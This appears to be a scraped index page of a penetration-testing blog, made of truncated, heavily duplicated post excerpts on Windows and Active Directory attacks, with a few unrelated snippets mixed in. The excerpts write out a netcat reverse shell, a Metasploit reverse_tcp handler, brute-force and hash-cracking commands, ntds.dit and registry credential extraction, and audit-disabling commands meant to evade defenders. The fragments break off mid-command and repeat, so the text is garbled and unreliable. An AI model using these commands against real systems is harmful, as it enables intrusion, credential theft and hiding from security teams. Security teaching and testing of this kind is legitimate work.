Internal Infrastructure Pentest - Kerberoasting
- Firstly purge all the tickets - klist purge - klist - SPN scan for service accounts - setspn -T domain_name -F -Q */* - Now request Service...
- Firstly purge all the tickets - klist purge - klist - SPN scan for service accounts - setspn -T domain_name -F -Q */* - Now request Service...
Impacket: Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to...
root@kali:~# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV ftp </pre>
Setup a listener: nc -lvp 4444 Connect using netcat reverse shell: nc -e /bin/sh 4444
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f reg add "hklm\system\currentControlSet\Contro...
reg query “HKCU\Software\ORL\WinVNC3\Password” reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password reg query “HKCU\Software\SimonTatham\...
Skeleton Key Attack: This attack is very tricky. It makes the secondary password for the same user. Many malware takes advantage of this attack to create ...
Mimikatz: mimikatz is a tool gentilkiwi made to learn C and make somes experiments with Windows security. It’s now well known to extract plaintexts passwords...
Password Spraying: It is a technique of trying one password across all the domain users. - No tool needed. One can perform password spraing using cmd.ex...
Hashcat hashcat64.bin -a 0 -m 5600 hashes dict.txt -o output.pot
LLMNR (Link Local Multicast Name Rsolution): The Link-Local Multicast Name Resolution (LLMNR) is a protocol based on the Domain Name System (DNS) packet f...
Dumpsec: DumpSec is a security auditing program for Microsoft Windows. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, re...
Clear text proxy credentials of putty: reg query “HKCU\Software\SimonTatham\PuTTY\Sessions” This lists out all available sessions with pu...
Method1: ntdsutil snapshot "activate instance ntds" create quit quit ntdsutil snapshot "mount {GUID}" quit quit copy "MOUNT_POINT\windows\ntds\ntds.dit" "c:...
- reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f - PsExec64.exe \\172.20.10.8 -...
Active Reconnaissance Methods: Null Session: net use \[DA IP Address]\ipc$ “” “/user:” here we’re trying to connec...
Commands for Initial Investigation tasklist TASKLIST TASKLIST /M TASKLIST /V /FO CSV TASKLIST /SVC /FO LIST TASKLIST ...
Disable security policies and services to avoid detection by Blue team Auditpol /set /Category:System /failure:disable Services.msc: ...
- Firstly purge all the tickets - klist purge - klist - SPN scan for service accounts - setspn -T domain_name -F -Q */* - Now request Service...
Impacket: Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to...
root@kali:~# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV ftp </pre>
Setup a listener: nc -lvp 4444 Connect using netcat reverse shell: nc -e /bin/sh 4444
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f reg add "hklm\system\currentControlSet\Contro...
reg query “HKCU\Software\ORL\WinVNC3\Password” reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password reg query “HKCU\Software\SimonTatham\...
Skeleton Key Attack: This attack is very tricky. It makes the secondary password for the same user. Many malware takes advantage of this attack to create ...
Mimikatz: mimikatz is a tool gentilkiwi made to learn C and make somes experiments with Windows security. It’s now well known to extract plaintexts passwords...
Password Spraying: It is a technique of trying one password across all the domain users. - No tool needed. One can perform password spraing using cmd.ex...
Hashcat hashcat64.bin -a 0 -m 5600 hashes dict.txt -o output.pot
LLMNR (Link Local Multicast Name Rsolution): The Link-Local Multicast Name Resolution (LLMNR) is a protocol based on the Domain Name System (DNS) packet f...
Dumpsec: DumpSec is a security auditing program for Microsoft Windows. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, re...
Clear text proxy credentials of putty: reg query “HKCU\Software\SimonTatham\PuTTY\Sessions” This lists out all available sessions with pu...
Method1: ntdsutil snapshot "activate instance ntds" create quit quit ntdsutil snapshot "mount {GUID}" quit quit copy "MOUNT_POINT\windows\ntds\ntds.dit" "c:...
- reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f - PsExec64.exe \\172.20.10.8 -...
Commands for Initial Investigation tasklist TASKLIST TASKLIST /M TASKLIST /V /FO CSV TASKLIST /SVC /FO LIST TASKLIST ...
Disable security policies and services to avoid detection by Blue team Auditpol /set /Category:System /failure:disable Services.msc: ...
ALT+F4: Quit program ALT+SPACE: System Menu ALT+TAB: Switch between open programs CTRL+ALT+DEL: Task Manager or Windows Security Screen CTRL+B: Op...
%USERPROFILE% %PROGRAMDATA% %PUBLIC% %TMP% %WINDIR% %SYSTEMDRIVE% %SYSTEMROOT%
Visit http://ikat.ha.cked.net/ from the Browser
shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}::{24ad3ad4-a569-4530-98e1-ab02f9417aa8} Shell:Profile Shell:ProgramFiles Shell:System Shell:Control...
ALT+F4: Quit program ALT+SPACE: System Menu ALT+TAB: Switch between open programs CTRL+ALT+DEL: Task Manager or Windows Security Screen CTRL+B: Op...
%USERPROFILE% %PROGRAMDATA% %PUBLIC% %TMP% %WINDIR% %SYSTEMDRIVE% %SYSTEMROOT%
Visit http://ikat.ha.cked.net/ from the Browser
shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}::{24ad3ad4-a569-4530-98e1-ab02f9417aa8} Shell:Profile Shell:ProgramFiles Shell:System Shell:Control...
ALT+F4: Quit program ALT+SPACE: System Menu ALT+TAB: Switch between open programs CTRL+ALT+DEL: Task Manager or Windows Security Screen CTRL+B: Op...
%USERPROFILE% %PROGRAMDATA% %PUBLIC% %TMP% %WINDIR% %SYSTEMDRIVE% %SYSTEMROOT%
Visit http://ikat.ha.cked.net/ from the Browser
shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}::{24ad3ad4-a569-4530-98e1-ab02f9417aa8} Shell:Profile Shell:ProgramFiles Shell:System Shell:Control...
root@kali:~# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV ftp </pre>
Mimikatz: mimikatz is a tool gentilkiwi made to learn C and make somes experiments with Windows security. It’s now well known to extract plaintexts passwords...
Mimikatz: mimikatz is a tool gentilkiwi made to learn C and make somes experiments with Windows security. It’s now well known to extract plaintexts passwords...
Hashcat hashcat64.bin -a 0 -m 5600 hashes dict.txt -o output.pot
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f reg add "hklm\system\currentControlSet\Contro...
reg query “HKCU\Software\ORL\WinVNC3\Password” reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password reg query “HKCU\Software\SimonTatham\...
Clear text proxy credentials of putty: reg query “HKCU\Software\SimonTatham\PuTTY\Sessions” This lists out all available sessions with pu...
Brace Yourself: Cyber Attacks on Australian Businesses Set to Skyrocket
Over the last few days, I observed targeted campaigns against Microsoft brand. With multiple feed sources, found 447 unique malicious domains.
Brace Yourself: Cyber Attacks on Australian Businesses Set to Skyrocket
Over the last few days, I observed targeted campaigns against Microsoft brand. With multiple feed sources, found 447 unique malicious domains.
Command & Control Server:
https://www.fcc.gov/oet/ea/fccid
Command & Control Server:
https://www.fcc.gov/oet/ea/fccid
Responder.py -i local-ip -I interface
LLMNR (Link Local Multicast Name Rsolution): The Link-Local Multicast Name Resolution (LLMNR) is a protocol based on the Domain Name System (DNS) packet f...
Password Spraying: It is a technique of trying one password across all the domain users. - No tool needed. One can perform password spraing using cmd.ex...
Hashcat hashcat64.bin -a 0 -m 5600 hashes dict.txt -o output.pot
Password Spraying: It is a technique of trying one password across all the domain users. - No tool needed. One can perform password spraing using cmd.ex...
Hashcat hashcat64.bin -a 0 -m 5600 hashes dict.txt -o output.pot
sudo passwd kali sudo apt-get update sudo apt-get install xrdp lxde-core lxde tigervnc-standalone-server -y cd / sudo sed -i ‘s/allowed_users=.*/a...
adduser user1 passwd user1 type new password: xxxxxxxxxxxxxxx type confirm password: xxxxxxxxxxxx Adding user to the sudoers ...
HiveJack This tool can be used during internal penetration testing to dump Windows credentials from an already-compromised host. It allows one to dump SYSTEM...
Examples of at.exe being used maliciously in order to establish persistence in a manner almost identical to schtasks use as a lolbin (enter hashes into viru...
HiveJack This tool can be used during internal penetration testing to dump Windows credentials from an already-compromised host. It allows one to dump SYSTEM...
Examples of at.exe being used maliciously in order to establish persistence in a manner almost identical to schtasks use as a lolbin (enter hashes into viru...
HiveJack This tool can be used during internal penetration testing to dump Windows credentials from an already-compromised host. It allows one to dump SYSTEM...
Examples of at.exe being used maliciously in order to establish persistence in a manner almost identical to schtasks use as a lolbin (enter hashes into viru...
sudo passwd kali sudo apt-get update sudo apt-get install xrdp lxde-core lxde tigervnc-standalone-server -y cd / sudo sed -i ‘s/allowed_users=.*/a...
Disable security policies and services to avoid detection by Blue team Auditpol /set /Category:System /failure:disable Services.msc: ...
Disable security policies and services to avoid detection by Blue team Auditpol /set /Category:System /failure:disable Services.msc: ...
Commands for Initial Investigation tasklist TASKLIST TASKLIST /M TASKLIST /V /FO CSV TASKLIST /SVC /FO LIST TASKLIST ...
Commands for Initial Investigation tasklist TASKLIST TASKLIST /M TASKLIST /V /FO CSV TASKLIST /SVC /FO LIST TASKLIST ...
Active Reconnaissance Methods: Null Session: net use \[DA IP Address]\ipc$ “” “/user:” here we’re trying to connec...
- reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f - PsExec64.exe \\172.20.10.8 -...
- reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f - PsExec64.exe \\172.20.10.8 -...
Method1: ntdsutil snapshot "activate instance ntds" create quit quit ntdsutil snapshot "mount {GUID}" quit quit copy "MOUNT_POINT\windows\ntds\ntds.dit" "c:...
Method1: ntdsutil snapshot "activate instance ntds" create quit quit ntdsutil snapshot "mount {GUID}" quit quit copy "MOUNT_POINT\windows\ntds\ntds.dit" "c:...
Dumpsec: DumpSec is a security auditing program for Microsoft Windows. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, re...
Dumpsec: DumpSec is a security auditing program for Microsoft Windows. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, re...
Dumpsec: DumpSec is a security auditing program for Microsoft Windows. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, re...
Hashcat hashcat64.bin -a 0 -m 5600 hashes dict.txt -o output.pot
Hashcat hashcat64.bin -a 0 -m 5600 hashes dict.txt -o output.pot
Hashcat hashcat64.bin -a 0 -m 5600 hashes dict.txt -o output.pot
Password Spraying: It is a technique of trying one password across all the domain users. - No tool needed. One can perform password spraing using cmd.ex...
Password Spraying: It is a technique of trying one password across all the domain users. - No tool needed. One can perform password spraing using cmd.ex...
Password Spraying: It is a technique of trying one password across all the domain users. - No tool needed. One can perform password spraing using cmd.ex...
Mimikatz: mimikatz is a tool gentilkiwi made to learn C and make somes experiments with Windows security. It’s now well known to extract plaintexts passwords...
Mimikatz: mimikatz is a tool gentilkiwi made to learn C and make somes experiments with Windows security. It’s now well known to extract plaintexts passwords...
Mimikatz: mimikatz is a tool gentilkiwi made to learn C and make somes experiments with Windows security. It’s now well known to extract plaintexts passwords...
Skeleton Key Attack: This attack is very tricky. It makes the secondary password for the same user. Many malware takes advantage of this attack to create ...
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f reg add "hklm\system\currentControlSet\Contro...
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f reg add "hklm\system\currentControlSet\Contro...
Setup a listener: nc -lvp 4444 Connect using netcat reverse shell: nc -e /bin/sh 4444
root@kali:~# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV ftp </pre>
root@kali:~# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV ftp </pre>
Impacket: Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to...
Impacket: Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to...
Impacket: Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to...
- Firstly purge all the tickets - klist purge - klist - SPN scan for service accounts - setspn -T domain_name -F -Q */* - Now request Service...
- Firstly purge all the tickets - klist purge - klist - SPN scan for service accounts - setspn -T domain_name -F -Q */* - Now request Service...
- sudo wget http://downloads.nessus.org/nessus3dl.php?file=Nessus-6.11.1-debian6_amd64.deb - sudo dpkg -i Nessus-6.11.1-debian6_amd64.deb - Incase you hav...
Ping sweep is the process of pinging an entire range of network ip addresses to find out which ones are online or alive. Nmap is an excellent tool to do t...
Ping sweep is the process of pinging an entire range of network ip addresses to find out which ones are online or alive. Nmap is an excellent tool to do t...
Download Procdump: https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Download Procdump: https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Responder.py -i local-ip -I interface
Responder.py -i local-ip -I interface
Responder.py -i local-ip -I interface
• Windows 7 UAC whitelist, http://www.pretentiousname.com/misc/win7_uac_whitelist2.html • Malicious Application Compatibility Shims, https://www.blackhat.co...
• Windows 7 UAC whitelist, http://www.pretentiousname.com/misc/win7_uac_whitelist2.html • Malicious Application Compatibility Shims, https://www.blackhat.co...
- Boot the machine with Kali - fdisk -l - look for (HPFS/NTFS/exFat) in the Type column of the about command - mkdir /mnt/nts - mount -t -ntfs-3g /dev/sda1 ...
- Boot the machine with Kali - fdisk -l - look for (HPFS/NTFS/exFat) in the Type column of the about command - mkdir /mnt/nts - mount -t -ntfs-3g /dev/sda1 ...
adduser user1 passwd user1 type new password: xxxxxxxxxxxxxxx type confirm password: xxxxxxxxxxxx Adding user to the sudoers ...
Handler on Msfconsole - use exploit/multi/handler - set PAYLOAD windows/meterpreter/reverse_tcp - set LHOST localhost - set LPORT 4444 - set Exi...
Handler on Msfconsole - use exploit/multi/handler - set PAYLOAD windows/meterpreter/reverse_tcp - set LHOST localhost - set LPORT 4444 - set Exi...
msf > use auxiliary/scanner/smb/smb_enum_gpp msf auxiliary(smb_enum_gpp) > set SMBUSER test SMBUSER => test msf auxiliary(smb_enum_gpp) > set S...
msf > use auxiliary/scanner/smb/smb_enum_gpp msf auxiliary(smb_enum_gpp) > set SMBUSER test SMBUSER => test msf auxiliary(smb_enum_gpp) > set S...
SOCKS 5 proxy tunnel:
SOCKS 5 proxy tunnel:
SOCKS 5 proxy tunnel:
Below are some of the vulnerability reports in the HTML to PDF converters or PDF parsers.
Below are some of the vulnerability reports in the HTML to PDF converters or PDF parsers.
Thanks to Keld Norman
Thanks to Keld Norman
HiveJack This tool can be used during internal penetration testing to dump Windows credentials from an already-compromised host. It allows one to dump SYSTEM...
I was playing with the Pi hole on one of my old Raspberry Pi and noticed that my 32 GB SanDisk Micro SD card was showing only 100 MB as space. I tried multip...
I was playing with the Pi hole on one of my old Raspberry Pi and noticed that my 32 GB SanDisk Micro SD card was showing only 100 MB as space. I tried multip...
I was playing with the Pi hole on one of my old Raspberry Pi and noticed that my 32 GB SanDisk Micro SD card was showing only 100 MB as space. I tried multip...
Phirautee A proof of concept crypto virus to spread user awareness about attacks and implications of ransomwares. Phirautee is written purely using PowerShel...
Phirautee A proof of concept crypto virus to spread user awareness about attacks and implications of ransomwares. Phirautee is written purely using PowerShel...
Phirautee A proof of concept crypto virus to spread user awareness about attacks and implications of ransomwares. Phirautee is written purely using PowerShel...
Nette Framework: Nette Framework is an open-source framework for creating web applications in PHP 5 and 7. It supports AJAX, DRY, KISS, MVC and code reusabil...
Nette Framework: Nette Framework is an open-source framework for creating web applications in PHP 5 and 7. It supports AJAX, DRY, KISS, MVC and code reusabil...
Nette Framework: Nette Framework is an open-source framework for creating web applications in PHP 5 and 7. It supports AJAX, DRY, KISS, MVC and code reusabil...
BigBountyRecon BigBountyRecon tool utilises 58 different techniques using various Google dorks and open source tools to expedite the process of initial recon...
Happy New Year, readers!
Happy New Year, readers!
Happy New Year, readers!
In-memory execution is a technique used by malware developers to evade detection by traditional antivirus solutions. Instead of writing their malicious code ...
In-memory execution is a technique used by malware developers to evade detection by traditional antivirus solutions. Instead of writing their malicious code ...